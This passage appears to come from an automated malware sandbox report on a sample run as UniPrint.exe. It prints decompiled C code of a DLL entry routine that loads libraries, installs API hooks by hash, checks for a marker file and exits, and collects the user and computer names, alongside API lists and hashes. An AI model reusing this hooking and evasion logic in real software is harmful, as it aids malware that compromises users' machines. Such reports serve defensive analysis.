                                                                                                          • Part of subcall function 709812E0: #20.CABINET(Function_00001030,Function_00001050,Function_00001000,Function_00001070,Function_000010A0,Function_000010D0,Function_000010E0,000000FF,?), ref: 70981318
                                                                                                          • Part of subcall function 709812E0: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 70981343
                                                                                                          • Part of subcall function 709812E0: #21.CABINET(00000000,00000000,?), ref: 7098135C
                                                                                                          • Part of subcall function 709812E0: CloseHandle.KERNEL32(00000000), ref: 70981367
                                                                                                          • Part of subcall function 709812E0: GetTickCount.KERNEL32 ref: 7098137D
                                                                                                          • Part of subcall function 709812E0: RtlRandom.NTDLL ref: 7098138C
                                                                                                          • Part of subcall function 709812E0: lstrcpyA.KERNEL32(?,?), ref: 7098139D
                                                                                                          • Part of subcall function 709812E0: PathRemoveFileSpecA.SHLWAPI(?), ref: 709813A8
                                                                                                          • Part of subcall function 709812E0: PathAddBackslashA.SHLWAPI(?), ref: 709813B3
                                                                                                          • Part of subcall function 709812E0: PathFindFileNameA.SHLWAPI(?,?,00000000,Function_00001100,00000000,?), ref: 709813DC
                                                                                                          • Part of subcall function 709812E0: #22.CABINET(00000000,00000000), ref: 709813E4
                                                                                                          • Part of subcall function 709812E0: #23.CABINET(00000000), ref: 709813F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$FilePathProcess$ByteCharFreeMultiWide$AllocBackslashCloseCountCreateFindHandleNameRandomRemoveSpecTicklstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3447959136-0
                                                                                                        • Opcode ID: 86ac2475d5f584280c7b5dab1b8d8f7c6885e7f9f268dfde6c43f315f12e0e7f
                                                                                                        • Instruction ID: 0b18fc151fa3524f365810e8f74516fd68b89fb5a665bb7166f4ffd619be18f4
                                                                                                        • Opcode Fuzzy Hash: 86ac2475d5f584280c7b5dab1b8d8f7c6885e7f9f268dfde6c43f315f12e0e7f
                                                                                                        • Instruction Fuzzy Hash: 37F06DF6A053187FE20056E19C89F2B7B6CDB816A8F000929BA1587390D97ADC0192A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A810, Relevance: 5.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E7098A810(char* _a4, signed int _a8, intOrPtr* _a12) {
				intOrPtr* _t12;
				short* _t13;
				int _t14;
				int _t18;
				char* _t19;

				_t19 = _a4;
				_t13 = 0;
				asm("sbb esi, esi");
				_t18 =  ~_a8 & 0x0000fde9;
				_t14 = MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, 0, 0);
				if(_t14 > 0) {
					_t4 = _t14 + 2; // 0x2
					_t13 = HeapAlloc(GetProcessHeap(), 8, _t14 + _t4);
					MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, _t13, _t14);
					_t12 = _a12;
					if(_t12 != 0) {
						 *_t12 = _t14 - 1;
					}
				}
				return _t13;
			}








                                                                                                        0x7098a812
                                                                                                        0x7098a81c
                                                                                                        0x7098a825
                                                                                                        0x7098a828
                                                                                                        0x7098a835
                                                                                                        0x7098a839
                                                                                                        0x7098a83b
                                                                                                        0x7098a850
                                                                                                        0x7098a859
                                                                                                        0x7098a85f
                                                                                                        0x7098a865
                                                                                                        0x7098a868
                                                                                                        0x7098a868
                                                                                                        0x7098a865
                                                                                                        0x7098a870

                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,77E34620,00000100,74B04F20,00000000,70988E8F,00000000,00000000,00000000,4B7826AF,00000100), ref: 7098A82F
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000002), ref: 7098A842
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098A849
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 7098A859
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1432973188-0
                                                                                                        • Opcode ID: 36e1b228abc6cbe30ea24859591a34fa802382f768c9f06df07970166a2fa779
                                                                                                        • Instruction ID: 1bd3a40d07be536f5227d9862adc7d33b000b50ca8f3e33e9eb5bd1809ac894e
                                                                                                        • Opcode Fuzzy Hash: 36e1b228abc6cbe30ea24859591a34fa802382f768c9f06df07970166a2fa779
                                                                                                        • Instruction Fuzzy Hash: D2F044B72047157FF2004A9A8C88E67B7ACEB856B5B114235B925D22D0D634AC0586B1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Analysis Process: UniPrint.exe PID: 6736 Parent PID: 4940 UniPrint.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 70988AF0, Relevance: 200.5, APIs: 110, Strings: 4, Instructions: 1015memorystringthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			_entry_(struct HINSTANCE__* _a4, intOrPtr _a8) {
				char _v536;
				short _v552;
				short _v556;
				short _v592;
				short _v596;
				short _v600;
				short _v604;
				short _v608;
				short _v612;
				short _v616;
				short _v620;
				short _v624;
				intOrPtr _v628;
				int _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				int _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				int _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				int _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				int _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				int _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				int _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				int _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				int _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				int _v776;
				intOrPtr _v780;
				char _v784;
				intOrPtr _v788;
				int _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				int _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				int _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				int _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				void* _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				void* _v872;
				long _v876;
				intOrPtr _v880;
				char _v884;
				long _v892;
				int _v900;
				short _v904;
				intOrPtr _v908;
				int _v916;
				intOrPtr _v920;
				int _v924;
				intOrPtr _v928;
				int _v932;
				intOrPtr _v936;
				int _v940;
				intOrPtr _v944;
				int _v948;
				int _v952;
				int _v956;
				int _v960;
				int _v964;
				char _v968;
				char _v972;
				short _v974;
				char _v976;
				short _v978;
				char _v980;
				short _v982;
				char _v984;
				short _v986;
				short _v988;
				int _v992;
				char _v996;
				intOrPtr _v1000;
				struct HINSTANCE__* _v1004;
				intOrPtr _t229;
				void* _t230;
				void* _t231;
				void* _t232;
				void* _t233;
				void* _t234;
				void* _t235;
				void* _t236;
				struct HINSTANCE__* _t238;
				struct HINSTANCE__* _t239;
				struct HINSTANCE__* _t240;
				struct HINSTANCE__* _t241;
				struct HINSTANCE__* _t242;
				struct HINSTANCE__* _t243;
				struct HINSTANCE__* _t244;
				void* _t245;
				void* _t246;
				void* _t247;
				void* _t248;
				void* _t250;
				WCHAR* _t284;
				WCHAR* _t288;
				void* _t291;
				WCHAR* _t292;
				WCHAR* _t296;
				WCHAR* _t298;
				long _t299;
				WCHAR* _t301;
				intOrPtr _t303;
				intOrPtr _t304;
				void* _t306;
				WCHAR* _t323;
				intOrPtr _t329;
				short* _t330;
				WCHAR* _t333;
				signed int _t334;
				int _t337;
				struct HINSTANCE__* _t338;
				struct HINSTANCE__* _t340;
				char _t342;
				void* _t343;
				struct HINSTANCE__* _t347;
				WCHAR* _t350;
				struct HINSTANCE__* _t353;
				void* _t354;
				struct HINSTANCE__* _t358;
				void* _t359;
				struct HINSTANCE__* _t363;
				WCHAR* _t365;
				struct HINSTANCE__* _t368;
				void* _t369;
				struct HINSTANCE__* _t373;
				void* _t375;
				struct HINSTANCE__* _t381;
				intOrPtr _t382;
				intOrPtr _t395;
				char* _t396;
				struct HWND__* _t398;
				struct HWND__* _t400;
				char _t403;
				signed short* _t408;
				signed short* _t409;
				int _t410;
				WCHAR* _t413;
				WCHAR* _t414;
				void* _t417;
				void* _t418;
				WCHAR* _t420;
				int _t421;
				long _t426;
				WCHAR* _t428;
				intOrPtr _t429;
				void* _t430;
				WCHAR* _t431;
				intOrPtr* _t433;
				WCHAR* _t436;
				void* _t438;
				WCHAR* _t441;
				WCHAR* _t445;
				WCHAR* _t459;
				WCHAR* _t461;
				WCHAR* _t465;
				WCHAR* _t466;
				WCHAR* _t467;
				void* _t471;
				WCHAR* _t472;
				WCHAR* _t473;
				WCHAR* _t476;
				WCHAR* _t477;
				WCHAR* _t478;
				WCHAR* _t481;
				WCHAR* _t483;
				WCHAR* _t484;
				intOrPtr _t489;
				intOrPtr _t497;
				WCHAR* _t498;
				void* _t507;
				signed int _t508;
				void** _t511;
				intOrPtr* _t514;
				void* _t517;
				void* _t520;
				void* _t521;
				void* _t525;
				void* _t528;
				void* _t530;
				void* _t532;
				void* _t534;
				void* _t536;
				void* _t538;
				void* _t540;
				void* _t542;
				void* _t546;

				_t520 =  &_v908;
				_t229 = _a8;
				if(_t229 == 0) {
					_t230 =  *0x7098f578; // 0xa51cc8
					__eflags = _t230;
					if(_t230 != 0) {
						HeapFree(GetProcessHeap(), 0, _t230);
					}
					_t231 =  *0x7098f5cc; // 0xa4b6c8
					__eflags = _t231;
					if(_t231 != 0) {
						HeapFree(GetProcessHeap(), 0, _t231);
					}
					_t232 =  *0x7098f5d4; // 0xa610b8
					__eflags = _t232;
					if(_t232 != 0) {
						HeapFree(GetProcessHeap(), 0, _t232);
					}
					_t233 =  *0x7098f5e0; // 0xa42bb0
					__eflags = _t233;
					if(_t233 != 0) {
						HeapFree(GetProcessHeap(), 0, _t233);
					}
					_t234 =  *0x7098f5a8; // 0xa521e0
					__eflags = _t234;
					if(_t234 != 0) {
						_push(_t234);
						__eflags =  *0x7098f5ac; // 0x1
						if(__eflags == 0) {
							HeapFree(GetProcessHeap(), 0, ??);
						} else {
							L7098BF7A();
						}
					}
					_t235 =  *0x7098f5b4; // 0xa599f8
					__eflags = _t235;
					if(_t235 != 0) {
						_push(_t235);
						__eflags =  *0x7098f5b8; // 0x1
						if(__eflags == 0) {
							HeapFree(GetProcessHeap(), 0, ??);
						} else {
							L7098BF7A();
						}
					}
					_t236 =  *0x7098f57c; // 0xa65be8
					__eflags = _t236;
					if(_t236 != 0) {
						HeapFree(GetProcessHeap(), 0, _t236);
					}
					__eflags =  *0x7098f6c8; // 0x1
					if(__eflags != 0) {
						_t238 =  *0x7098f558; // 0x6caf0000
						__eflags = _t238;
						if(_t238 != 0) {
							FreeLibrary(_t238);
						}
						_t239 =  *0x7098f540; // 0x77400000
						__eflags = _t239;
						if(_t239 != 0) {
							FreeLibrary(_t239);
						}
						_t240 =  *0x7098f544; // 0x760b0000
						__eflags = _t240;
						if(_t240 != 0) {
							FreeLibrary(_t240);
						}
						_t241 =  *0x7098f548; // 0x75d50000
						__eflags = _t241;
						if(_t241 != 0) {
							FreeLibrary(_t241);
						}
						_t242 =  *0x7098f54c; // 0x73de0000
						__eflags = _t242;
						if(_t242 != 0) {
							FreeLibrary(_t242);
						}
						_t243 =  *0x7098f550; // 0x75ec0000
						__eflags = _t243;
						if(_t243 != 0) {
							FreeLibrary(_t243);
						}
						_t244 =  *0x7098f554; // 0x708c0000
						__eflags = _t244;
						if(_t244 != 0) {
							FreeLibrary(_t244);
						}
						_t245 =  *0x7098f5c8; // 0xa4cec0
						__eflags = _t245;
						if(_t245 != 0) {
							HeapFree(GetProcessHeap(), 0, _t245);
						}
						_t246 =  *0x7098f5a0; // 0xa44520
						__eflags = _t246;
						if(_t246 != 0) {
							LocalFree(_t246);
						}
						__eflags =  *0x7098f6c4 - 2;
						if( *0x7098f6c4 == 2) {
							E7098BBC0(0);
						}
						__eflags =  *0x7098f6c4; // 0x2
						if(__eflags > 0) {
							E7098B890();
						}
						_t511 = 0x7098f51c;
						do {
							_t247 =  *_t511;
							__eflags = _t247;
							if(_t247 != 0) {
								CloseHandle(_t247);
							}
							_t511 =  &(_t511[1]);
							__eflags = _t511 - 0x7098f528;
						} while (_t511 < 0x7098f528);
						_t248 =  *0x7098f5c0; // 0x330
						__eflags = _t248;
						if(_t248 != 0) {
							NtTerminateThread(_t248, 0);
							_t250 =  *0x7098f5c0; // 0x330
							CloseHandle(_t250);
						}
					}
					goto L108;
				} else {
					if(_t229 != 1) {
						L108:
						return 1;
					} else {
						DisableThreadLibraryCalls(_a4);
						 *0x7098f538 = GetModuleHandleW(0);
						_v904 = 0;
						_t284 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
						 *0x7098f578 = _t284;
						if(GetSystemDirectoryW(_t284, 0x105) == 0) {
							ExitProcess(0);
						}
						_t428 =  *0x7098f578; // 0xa51cc8
						PathAddBackslashW(_t428);
						_t288 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
						 *0x7098f5cc = _t288;
						 *0x7098f5dc = GetModuleFileNameW(_a4, _t288, 0x104);
						_t291 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
						_t429 =  *0x7098f5dc; // 0x33
						_t430 =  *0x7098f5cc; // 0xa4b6c8
						 *0x7098f5d4 = _t291;
						RtlMoveMemory(_t291, _t430, _t429 + _t429);
						_t292 =  *0x7098f5cc; // 0xa4b6c8
						_t465 =  *0x7098f5d4; // 0xa610b8
						 *0x7098f5d8 = _t465;
						PathRemoveFileSpecW(_t292);
						_t431 =  *0x7098f5cc; // 0xa4b6c8
						PathAddBackslashW(_t431);
						_t466 =  *0x7098f5cc; // 0xa4b6c8
						SetCurrentDirectoryW(_t466);
						_t296 =  *0x7098f5cc; // 0xa4b6c8
						 *0x7098f5d0 = _t296; // executed
						__imp__SHGetSpecialFolderPathW(0,  &_v536, 0, 0); // executed
						if(_t296 != 0) {
							PathAddBackslashW( &_v552);
							lstrcatW( &_v556, StrChrW(0x7098ce48, 0x66));
							_t426 = GetFileAttributesW( &_v556); // executed
							if(_t426 == 0xffffffff) {
								goto L7;
							} else {
								ExitProcess(0);
							}
						}
						L7:
						_t298 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
						 *0x7098f5e0 = _t298;
						_t299 = GetModuleFileNameW(0, _t298, 0x104);
						_t467 =  *0x7098f5e0; // 0xa42bb0
						 *0x7098f5e8 = _t299;
						 *0x7098f5ec = PathFindFileNameW(_t467);
						_t301 =  *0x7098f5e0; // 0xa42bb0
						 *0x7098f5e4 = _t301;
						L7098BF02();
						 *0x7098f2a8 = 0x11c;
						L7098BF62();
						 *0x7098f5f8 = E709833D0(0);
						_t303 = E70983370(0);
						_t521 = _t520 + 8;
						 *0x7098f5f4 = _t303;
						__imp__WTSGetActiveConsoleSessionId(0x7098f2a8, 0x7098f2a8, 0x11c);
						_t433 =  *0x7098f538; // 0x400000
						 *0x7098f598 = _t303;
						if( *_t433 != 0x5a4d) {
							goto L108;
						} else {
							_t10 = _t433 + 0x3c; // 0x100
							_t514 =  *_t10 + _t433;
							if( *_t514 != 0x4550) {
								goto L108;
							} else {
								_v948 =  *((intOrPtr*)(_t514 + 0x58));
								_push( &_v856);
								_push(0x7098f5a8);
								_push(5);
								_push(_t303);
								_push(0);
								_v840 =  *((intOrPtr*)(_t514 + 8));
								_v856 = 0;
								L7098BF80(); // executed
								if(_t303 != 0) {
									 *0x7098f5ac = 1;
								} else {
									_t420 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
									 *0x7098f5a8 = _t420;
									if(_t420 != 0) {
										_v876 = 0x104;
										_t421 = GetUserNameW(_t420,  &_v876);
										if(_t421 == 0) {
											_t461 =  *0x7098f5a8; // 0xa521e0
											 *_t461 = _t421;
										}
									}
								}
								_t304 =  *0x7098f598; // 0x1
								_push( &_v872);
								_push(0x7098f5b4);
								_push(7);
								_push(_t304);
								_push(0);
								_v872 = 0;
								L7098BF80(); // executed
								if(_t304 != 0) {
									 *0x7098f5b8 = 1;
								} else {
									_t417 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
									 *0x7098f5b4 = _t417;
									if(_t417 != 0) {
										_v892 = 0x104;
										__imp__GetComputerNameExW(2, _t417,  &_v892);
										if(_t417 == 0) {
											_t418 =  *0x7098f5b4; // 0xa599f8
											 *_t418 = 0;
										}
									}
								}
								_t436 =  *0x7098f5a8; // 0xa521e0
								_t471 =  *0x7098f5b4; // 0xa599f8
								 *0x7098f5a4 = _t436;
								 *0x7098f5b0 = _t471;
								_t306 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
								 *0x7098f57c = _t306;
								if(_t306 != 0) {
									_push(StrChrW(0x7098cdf0, 0x2e));
									_push(StrChrW(0x7098ce30, 0x54));
									_t413 =  *0x7098f5cc; // 0xa4b6c8
									_push(_t413);
									_t414 = StrChrW(0x7098ca08, 0x25);
									_t459 =  *0x7098f57c; // 0xa65be8
									wsprintfW(_t459, _t414);
									_t498 =  *0x7098f57c; // 0xa65be8
									_t521 = _t521 + 0x14;
									 *0x7098f580 = _t498;
								}
								if(_v988 == 0x435a88 || _v880 == 0x4b4ca51f) {
									_push(0x7098f5a0);
									 *0x7098f6c8 = 1;
									 *0x7098f55c = E709834E0();
									 *0x7098f630 = E70981DE0(0x4b7826af, _t514);
									 *0x7098f5c8 = E7098A810(_t308, 0, 0);
									 *0x7098f5fc = E70981DE0(0x4b74e943, _t514);
									 *0x7098f620 = E70981DE0(0x4b748227, _t514);
									 *0x7098f600 = E70981DE0(0x4b78da29, _t514);
									 *0x7098f604 = E70981DE0(0x4b78da2b, _t514);
									 *0x7098f624 = E70981DE0(0x4b748f8b, _t514);
									 *0x7098f628 = E70981DE0(0x4b75d29f, _t514);
									 *0x7098f62c = E70981DE0(0x4b748f4f, _t514);
									 *0x7098f608 = E70981DE0(0x4b75cfdb, _t514);
									 *0x7098f60c = E70981DE0(0x4b7b65cf, _t514);
									 *0x7098f610 = E70981DE0(0x4b7b46e7, _t514);
									 *0x7098f614 = E70981DE0(0x4b74fb9f, _t514);
									 *0x7098f618 = E70981DE0(0x4b7813df, _t514);
									 *0x7098f61c = E70981DE0(0x4b7b324b, _t514);
									_t323 = E70981DE0(0x4b74bac7, _t514);
									 *0x7098f58c = _t323;
									 *0x7098f590 = lstrlenW(_t323);
									 *0x7098f634 = E70981DE0(0x4b785a9f, _t514);
									 *0x7098f588 = E70981DE0(0x4b752f43, _t514);
									 *0x7098f584 = E70981DE0(0x4b752097, _t514);
									 *0x7098f638 = E70981DE0(0x4b78d5c7, _t514);
									_t329 = E70981DE0(0x4b78d567, _t514);
									_t525 = _t521 + 0xb0;
									 *0x7098f52c = _t329;
									_t330 = GetCommandLineW();
									_t437 =  &_v900;
									_v900 = 0;
									_t517 = CommandLineToArgvW(_t330,  &_v900);
									if(_t517 != 0) {
										CharLowerW( *_t517);
										_t497 = _v908;
										if(_t497 > 1) {
											_t508 = 1;
											do {
												if(_t508 >= _t497 - 1) {
													L30:
													_t408 =  *(_t517 + _t508 * 4);
													_t437 =  *_t408 & 0x0000ffff;
													__eflags = _t437 - 0x6b;
													if(_t437 != 0x6b) {
														L33:
														__eflags = _t437 - 0x66;
														if(_t437 == 0x66) {
															__eflags = _t408[1];
															if(_t408[1] == 0) {
																 *0x7098f568 = 1;
															}
														}
													} else {
														__eflags = _t408[1];
														if(_t408[1] != 0) {
															goto L33;
														} else {
															 *0x7098f564 = 1;
														}
													}
												} else {
													_t409 =  *(_t517 + _t508 * 4);
													if( *_t409 != 0x77 || _t409[1] != 0) {
														goto L30;
													} else {
														_t437 =  *(_t517 + 4 + _t508 * 4);
														_t508 = _t508 + 1;
														_t410 = StrToIntW(_t437);
														_t497 = _v908;
														 *0x7098f5c4 = _t410;
													}
												}
												_t508 = _t508 + 1;
											} while (_t508 < _t497);
										}
										LocalFree(_t517);
									}
									_push(8);
									_push(0x7098f3c8);
									L7098BF02();
									_t472 =  *0x7098f5cc; // 0xa4b6c8
									E709821D0(_t437, _t472, 1);
									_t333 =  *0x7098f5a0; // 0xa44520
									_t438 =  *0x7098f5b0; // 0xa599f8
									_t473 =  *0x7098f5a4; // 0xa521e0
									_t334 = E709832A0(_t473, _t438, _t333);
									_v900 = 0;
									_t441 =  *0x7098f5a0; // 0xa44520
									_v904 = 0x640067;
									 *0x7098f594 = _t334 % 0x7fffffff;
									_t476 =  *0x7098f57c; // 0xa65be8
									_t337 = GetPrivateProfileIntW(_t441,  &_v904, 0, _t476);
									_t477 =  *0x7098f5d4; // 0xa610b8
									 *0x7098f56c = _t337; // executed
									_t338 = GetModuleHandleW(_t477); // executed
									 *0x7098f53c = _t338;
									_t340 = GetModuleHandleW(E70981DE0(0x4b78c927, _t514));
									_push(0x4b4ca51f);
									_push(1);
									_push( &_v996);
									_push(_t340);
									_v1004 = _t340;
									_v996 = 0x8059adc3;
									_v992 = 0;
									_v988 = 0;
									_v984 = 0;
									E70981E40();
									_t342 = _v984;
									_t528 = _t525 + 0x2c;
									if(_t342 != 0) {
										 *0x7098f63c = _t342;
									}
									_t343 = E70981DE0(0x4b7828f7, _t514);
									_t478 =  *0x7098f578; // 0xa51cc8
									_push(_t343);
									_push(_t478);
									wsprintfW( &_v624, StrChrW(0x7098c658, 0x25));
									_t530 = _t528 + 0x18;
									_t347 = LoadLibraryW( &_v616); // executed
									 *0x7098f558 = _t347;
									if(E7098B840() != 0) {
										ExitProcess(0);
									}
									 *0x7098f6c4 = 1;
									if(_v1000 != 0) {
										_push(0x4b4ca51f);
										_push(1);
										_push( &_v992);
										_push(_v1000);
										_v992 = 0x651c9114;
										_v988 = 0;
										_v984 = 0;
										_v980 = 0;
										E70981E40();
										_t403 = _v980;
										_t546 = _t530 + 0x10;
										if(_t403 != 0) {
											 *0x7098f640 = _t403;
										}
										_v992 = 0xeaa34c36;
										_v988 = E70988210;
										_v984 = 0x7098f654;
										_v980 = 0;
										_v976 = 0x92e0814c;
										_v972 = E70987E20;
										_v968 = 0x7098f644;
										_v964 = 0;
										_v960 = 0x3ed5a6e3;
										_v956 = E709881F0;
										_v952 = 0x7098f650;
										_v948 = 0;
										_v944 = 0x6107e09f;
										_v940 = E70988830;
										_v936 = 0x7098f6a8;
										_v932 = 0;
										_v928 = 0x3aebf048;
										_v924 = E709888B0;
										_v920 = 0x7098f6ac;
										_v916 = 0;
										E70982030(_v1000,  &_v992, 5, 0x4b4ca51f);
										_t530 = _t546 + 0x10;
									}
									_push(E70981DE0(0x4b783357, _t514));
									_t350 =  *0x7098f578; // 0xa51cc8
									_push(_t350);
									wsprintfW( &_v620, StrChrW(0x7098c658, 0x25));
									_t532 = _t530 + 0x18;
									_t353 = LoadLibraryW( &_v612);
									 *0x7098f540 = _t353;
									if(_t353 != 0) {
										_v884 = 0x4ae1b56a;
										_v880 = E709884F0;
										_v876 = 0x7098f698;
										_v872 = 0;
										_v868 = 0x869989e7;
										_v864 = E709886B0;
										_v860 = 0x7098f69c;
										_v856 = 0;
										_v852 = 0x8d4f8a9b;
										_v848 = E70988700;
										_v844 = 0x7098f6a0;
										_v840 = 0;
										_v836 = 0xce63a911;
										_v832 = E70988430;
										_v828 = 0x7098f670;
										_v824 = 0;
										_v820 = 0x9e791828;
										_v816 = E70988460;
										_v812 = 0x7098f674;
										_v808 = 0;
										_v804 = 0xd0d264;
										_v800 = E70988410;
										_v796 = 0x7098f668;
										_v792 = 0;
										_v788 = 0x6e9aa133;
										_v784 = E709884E0;
										_v780 = 0x7098f690;
										_v776 = 0;
										_v772 = 0x1c61f891;
										_v768 = E709883F0;
										_v764 = 0x7098f660;
										_v760 = 0;
										_v756 = 0xe8b54dc0;
										_v752 = E709883F0;
										_v748 = 0x7098f664;
										_v744 = 0;
										_v740 = 0xa09afab7;
										_v736 = E70988420;
										_v732 = 0x7098f694;
										_v728 = 0;
										_v724 = 0xd332de47;
										_v720 = E709884A0;
										_v716 = 0x7098f678;
										_v712 = 0;
										_v708 = 0xf64096c4;
										_v704 = E709884B0;
										_v700 = 0x7098f67c;
										_v696 = 0;
										_v692 = 0x8a0a6997;
										_v688 = E70988420;
										_v684 = 0x7098f66c;
										_v680 = 0;
										_v676 = 0xd9d93036;
										_v672 = E709884C0;
										_v668 = 0x7098f680;
										_v664 = 0;
										_v660 = 0xec1f4ad0;
										_v656 = E70988420;
										_v652 = 0x7098f684;
										_v648 = 0;
										_v644 = 0x7ef19b3a;
										_v640 = E709883A0;
										_v636 = 0x7098f658;
										_v632 = 0;
										_v628 = 0x1b80502b;
										_v624 = E709883D0;
										_v620 = 0x7098f65c;
										_v616 = 0;
										E70982030(_t353,  &_v884, 0x11, 0x4b4ca51f);
										_t489 =  *0x7098f628; // 0x798f80
										_t157 = _t489 + 9; // 0x6854706f
										_v988 =  *_t157;
										_t395 =  *0x7098f618; // 0x74cec0
										_t159 = _t395 + 0x1e; // 0x65006c
										_t532 = _t532 + 0x10;
										_v986 =  *_t159 & 0x0000ffff;
										_t161 = _t395 + 0x1e; // 0x65006c
										_t396 =  *0x7098f624; // 0x784294
										_v984 =  *_t161 & 0x0000ffff;
										_t163 = _t396 + 1; // 0x61476e79
										_v982 =  *_t163;
										_v978 = 0x62;
										_v980 =  *_t396;
										_t167 = _t396 + 3; // 0x65746147
										_v976 =  *_t167;
										_v974 = 0;
										_t398 = FindWindowW( &_v988, 0); // executed
										_v992 = _t398;
										_v976 = 0;
										_t400 = FindWindowW( &_v988, 0); // executed
										_v992 = _v992 + _t400;
									}
									_t354 = E70981DE0(0x4b783013, _t514);
									_t445 =  *0x7098f578; // 0xa51cc8
									_push(_t354);
									_push(_t445);
									wsprintfW( &_v616, StrChrW(0x7098c658, 0x25));
									_t534 = _t532 + 0x18;
									_t358 = LoadLibraryW( &_v608);
									 *0x7098f544 = _t358;
									if(_t358 != 0) {
										_v984 = 0x54e404c6;
										_v980 = E709884D0;
										_v976 = 0x7098f68c;
										_v972 = 0;
										_v968 = 0xefb3afee;
										_v964 = E70988410;
										_v960 = 0x7098f688;
										_v956 = 0;
										_v952 = 0x74c5f994;
										_v948 = E70988990;
										_v944 = 0x7098f6b8;
										_v940 = 0;
										_v936 = 0x14a997fc;
										_v932 = E709889C0;
										_v928 = 0x7098f6bc;
										_v924 = 0;
										E70982030(_t358,  &_v984, 4, 0x4b4ca51f);
										_t534 = _t534 + 0x10;
									}
									_t359 = E70981DE0(0x4b7830ff, _t514);
									_t481 =  *0x7098f578; // 0xa51cc8
									_push(_t359);
									_push(_t481);
									wsprintfW( &_v612, StrChrW(0x7098c658, 0x25));
									_t536 = _t534 + 0x18;
									_t363 = LoadLibraryW( &_v604);
									 *0x7098f548 = _t363;
									if(_t363 != 0) {
										_v980 = 0xeb4d73d6;
										_v976 = E70988140;
										_v972 = 0x7098f648;
										_v968 = 0;
										_v964 = 0x7ea26a9d;
										_v960 = E709881A0;
										_v956 = 0x7098f64c;
										_v952 = 0;
										E70982030(_t363,  &_v980, 2, 0x4b4ca51f);
										_t536 = _t536 + 0x10;
									}
									_push(E70981DE0(0x4b78304b, _t514));
									_t365 =  *0x7098f578; // 0xa51cc8
									_push(_t365);
									wsprintfW( &_v608, StrChrW(0x7098c658, 0x25));
									_t538 = _t536 + 0x18;
									_t368 = LoadLibraryW( &_v600);
									 *0x7098f54c = _t368;
									if(_t368 != 0) {
										_v976 = 0x79e81cff;
										_v972 = E709888E0;
										_v968 = 0x7098f6b0;
										_v964 = 0;
										E70982030(_t368,  &_v976, 1, 0x4b4ca51f);
										_t538 = _t538 + 0x10;
									}
									_t369 = E70981DE0(0x4b78309b, _t514);
									_t483 =  *0x7098f578; // 0xa51cc8
									_push(_t369);
									_push(_t483);
									wsprintfW( &_v604, StrChrW(0x7098c658, 0x25));
									_t540 = _t538 + 0x18;
									_t373 = LoadLibraryW( &_v596); // executed
									 *0x7098f550 = _t373;
									if(_t373 != 0) {
										_v972 = 0xefae4bd4;
										_v968 = E709884E0;
										_v964 = 0x7098f6a4;
										_v960 = 0;
										E70982030(_t373,  &_v972, 1, _v976 + 0x4b4ca51f);
										_t540 = _t540 + 0x10;
									}
									_t375 = E7098A810(E70981DE0(0x4b0c84db, _t514), 0, 0);
									_t484 =  *0x7098f578; // 0xa51cc8
									_t507 = _t375;
